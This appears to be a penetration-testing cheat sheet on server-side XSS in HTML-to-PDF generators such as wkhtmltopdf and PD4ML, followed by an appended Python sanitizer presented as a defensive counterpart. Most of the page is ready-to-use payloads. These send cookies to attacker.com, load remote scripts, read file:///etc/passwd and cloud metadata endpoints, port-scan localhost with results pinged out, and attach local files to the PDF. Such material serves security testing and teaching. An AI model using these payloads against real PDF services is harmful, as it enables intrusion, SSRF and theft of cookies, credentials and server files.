Server Side XSS (Dynamic PDF)

If a web page creates a PDF using user-controlled input, you can try to trick the bot that builds the PDF into executing arbitrary JS code.
So, if the PDF-creating bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS.

Please note that the <script></script> tags don't always work, so you will need a different method to execute JS (for example, abusing <img ).
Also, note that in a regular exploitation you will be able to see/download the created PDF, so you will be able to see everything you write via JS (using document.write() for example). But if you cannot see the created PDF, you will probably need to extract the information by making a web request to yourself (Blind).

Popular PDF generators

  • wkhtmltopdf is known for its ability to convert HTML and CSS into PDF documents, using the WebKit rendering engine. This tool is available as an open-source command-line utility, making it accessible for a wide range of applications.
  • TCPDF offers a robust solution within the PHP ecosystem for PDF generation. It can handle images, graphics and encryption, showcasing its versatility for creating complex documents.
  • For those working in a Node.js environment, PDFKit presents a viable option. It allows PDF documents to be generated directly from HTML and CSS, providing a bridge between web content and printable formats.
  • Java developers may prefer iText, a library that not only facilitates PDF creation but also supports advanced features such as digital signatures and form filling. Its comprehensive feature set makes it suitable for generating secure and interactive documents.
  • FPDF is another PHP library, distinguished by its simplicity and ease of use. It is designed for developers looking for a straightforward approach to PDF generation, without the need for extensive features.

Payloads

Discovery

```html
<!-- Basic discovery, write something -->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!-- Basic blind discovery, load a resource -->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">
```

SVG

Any of the previous or following payloads may be used inside this SVG payload. One iframe accessing the Burpcollab subdomain and another accessing the metadata endpoint are included as examples.

```html
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>


<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>
```

You can find many other SVG payloads in https://github.com/allanlw/svg-cheatsheet

Path disclosure

```html
<!-- If the bot is accessing a file:// path, you will discover the internal path;
if not, you will at least learn which path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>
```

Load an external script

The most convenient way to take advantage of this vulnerability is to abuse it to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.

```html
<script src="http://attacker.com/myscripts.js"></script>
<!-- the inner src is left unquoted so it does not terminate the onerror attribute -->
<img src="xasdasdasd" onerror="document.write('<script src=https://attacker.com/test.js></script>')"/>
```

Read local file / SSRF

Warning: change file:///etc/passwd to http://169.254.169.254/latest/user-data, for example, to try to access an external web page (SSRF).

If SSRF is allowed but you cannot reach an interesting domain or IP, check this page for potential bypasses.

```html
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
```

```html
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
```

```html
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd" width="400" height="400">
<style><iframe src="file:///etc/passwd">
<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
```

```html
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
```

Delay the bot

```html
<!-- Make the bot send a ping every 500ms to check how long the bot waits -->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">
```

Port scanning

```html
<!-- Scan local ports and receive a ping indicating which ones are found -->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}

for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
```

SSRF

This vulnerability can be turned very easily into an SSRF (since you can make the script load external resources). So just try to exploit it (read some metadata?).

Attachments: PD4ML

There are several HTML-to-PDF engines that allow attachments to be specified for the PDF, such as PD4ML. You can abuse this feature to attach any local file to the PDF.
To open the attachment I opened the file with Firefox and double-clicked the Paperclip symbol to store the attachment as a new file.
Capturing the PDF response with Burp should also show the attachment in clear text inside the PDF.

```html
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html>
<pd4ml:attachment
src="/etc/passwd"
description="attachment sample"
icon="Paperclip" />
</html>
```
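
As an added defensive counterpart to the payload sections above (discovery, SVG, local file read / SSRF, and the PD4ML attachment tag), not code from the original page: an allow-list sanitizer written here with Python's standard library, to run over user-controlled HTML before it is handed to whichever HTML-to-PDF engine is in use. The tag and attribute allow-lists are assumptions chosen for this example; widen them only with elements that carry no URL or script capability.

```python
# Added defensive example (not from the original page): allow-list sanitizer
# for user-controlled HTML *before* it reaches the PDF renderer. It drops the
# elements the payloads above rely on (script, iframe, img/onerror, svg,
# object, embed, portal, link, meta, annotation, pd4ml:attachment), all on*
# handlers and every non-http(s) URL, keeping only formatting and escaped text.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = set("p b i u em strong br ul ol li h1 h2 h3 table tr td th a".split())
ALLOWED_ATTRS = {"a": {"href"}}     # no src/href/data on anything else
DROP_CONTENT = {"script", "style"}  # their text is code, not content


def safe_url(url: str) -> bool:
    """Accept only absolute http(s) URLs: rejects file:, data:, javascript:."""
    parts = urlsplit(url.strip())
    return parts.scheme in ("http", "https") and bool(parts.netloc)


class PdfInputSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0  # skip > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        if self.skip or tag not in ALLOWED_TAGS:
            return  # unknown or dangerous element: tag removed, text kept
        # keep only allow-listed attributes that are not event handlers and
        # whose value is an absolute http(s) URL (file://, javascript: go)
        kept = [f' {n}="{escape(v, quote=True)}"' for n, v in attrs
                if not n.startswith("on") and n in ALLOWED_ATTRS.get(tag, ())
                and v is not None and safe_url(v)]
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT and self.skip:
            self.skip -= 1
        elif not self.skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))


def sanitize_for_pdf(html: str) -> str:
    p = PdfInputSanitizer()
    p.feed(html)
    p.close()  # flushes buffered text (convert_charrefs=True buffers it)
    return "".join(p.out)
```

Run the page's own payloads through sanitize_for_pdf() to confirm they come out empty; rendering the cleaned fragment with JavaScript and local file access disabled in the engine remains the second layer.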